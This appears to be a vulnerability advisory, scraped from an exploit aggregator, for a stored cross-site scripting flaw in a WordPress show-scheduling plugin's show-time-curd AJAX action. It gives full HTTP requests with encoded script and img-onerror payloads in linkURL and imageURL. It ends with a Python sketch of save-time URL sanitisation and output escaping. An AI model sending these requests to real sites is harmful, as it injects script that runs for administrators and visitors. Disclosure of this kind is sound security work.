## https://sploitus.com/exploit?id=WPEX-ID:C557FF04-31D5-4774-B101-1865A102BF16
Vulnerable parameters: linkURL (some validation is done) and imageURL.

(The easiest way to reproduce is via linkURL: put the following payload in the Link URL of a Schedule: https://aa.com/#"><script>alert(`XSS`)</script>)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 301
Connection: close
Cookie: [admin+]

action=show-time-curd&sday=Sunday&startTime=10%3A00&eday=Sunday&endTime=12%3A00&showname=Show&linkUrl=https%3A%2F%2Faa.com%2F%23%22%3E%3Cscript%3Ealert(%60XSS-linkURL%60)%3C%2Fscript%3E&imageUrl=%22%3e%3cimg%20src%20onerror%3dalert(%60XSS-imageURL%60)%3e&crud-action=create&joan_nonce_field=c0b1b9f0d4

The XSS is triggered in the plugin's settings page, on the frontend whenever the Show is displayed (for example via any of the shortcodes), and in the response of the show-time-curd AJAX action (available to both unauthenticated and authenticated users):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close

action=show-time-curd&crud-action=read

Furthermore, when updating a schedule, the linkURL is not validated at all (and the XSS triggers in the same places as described above):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 250
Connection: close
Cookie: [admin+]

action=show-time-curd&showName%5B11%5D=Show&linkURL%5B11%5D=%22%3e%3cimg%20src%20onerror%3dalert(%60XSS-linkURL%60)%3e&imageURL%5B11%5D=%22%3e%3cimg%20src%20onerror%3dalert(%60XSS-imageURL%60)%3e&crud-action=update&joan_entries_nonce_field=c3506180d5
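As an added illustration (not the plugin's or the advisory's code), the following Python models the two defences missing from both the create and the update flows above: the linkURL payload passes a scheme-prefix check because the breakout sits in the URL fragment, so a stored URL has to be sanitised on save and attribute-escaped again at output. The function names and the character class are my own; esc_url_raw and esc_attr are the WordPress functions they stand in for.

```python
"""Constructed model of the handling the show-time-curd handler lacks.

Not the plugin's code: it mirrors the WordPress pattern of sanitising a URL
on save (esc_url_raw) and escaping it again at the point of output
(esc_url / esc_attr). The payloads are decoded from the request bodies above.
"""
import re
from html import escape
from urllib.parse import urlsplit

LINK_PAYLOAD = 'https://aa.com/#"><script>alert(`XSS-linkURL`)</script>'
IMAGE_PAYLOAD = '"><img src onerror=alert(`XSS-imageURL`)>'

# Characters a URL may contain unencoded; everything else (quotes, angle
# brackets, backticks, whitespace) is dropped on save. Constructed set.
_URL_UNSAFE = re.compile(r"[^A-Za-z0-9\-~+_.?#=!&;,/:%@$|*'()\[\]]")


def naive_link_check(url: str) -> bool:
    """A scheme-prefix check: the kind of partial validation that still
    accepts the linkURL payload, because its prefix is a well-formed URL
    and the breakout lives in the fragment."""
    return url.startswith(("http://", "https://"))


def sanitize_url(url: str) -> str:
    """Save-time sanitisation: require an http(s) scheme and a host, then
    strip every character that has no place in a URL. Returns '' on reject,
    which is what happens to the imageURL payload (no scheme at all)."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return ""
    return _URL_UNSAFE.sub("", url)


def attr(value: str) -> str:
    """Output-time escaping for an HTML attribute value (role of esc_attr):
    a stray quote becomes &quot; and cannot terminate the attribute."""
    return escape(value, quote=True)


def render_show(link_url: str, image_url: str) -> str:
    """Hardened rendering of a Show: both layers applied to both fields,
    so neither stored payload can leave its attribute."""
    return (f'<a href="{attr(sanitize_url(link_url))}">'
            f'<img src="{attr(sanitize_url(image_url))}"></a>')
```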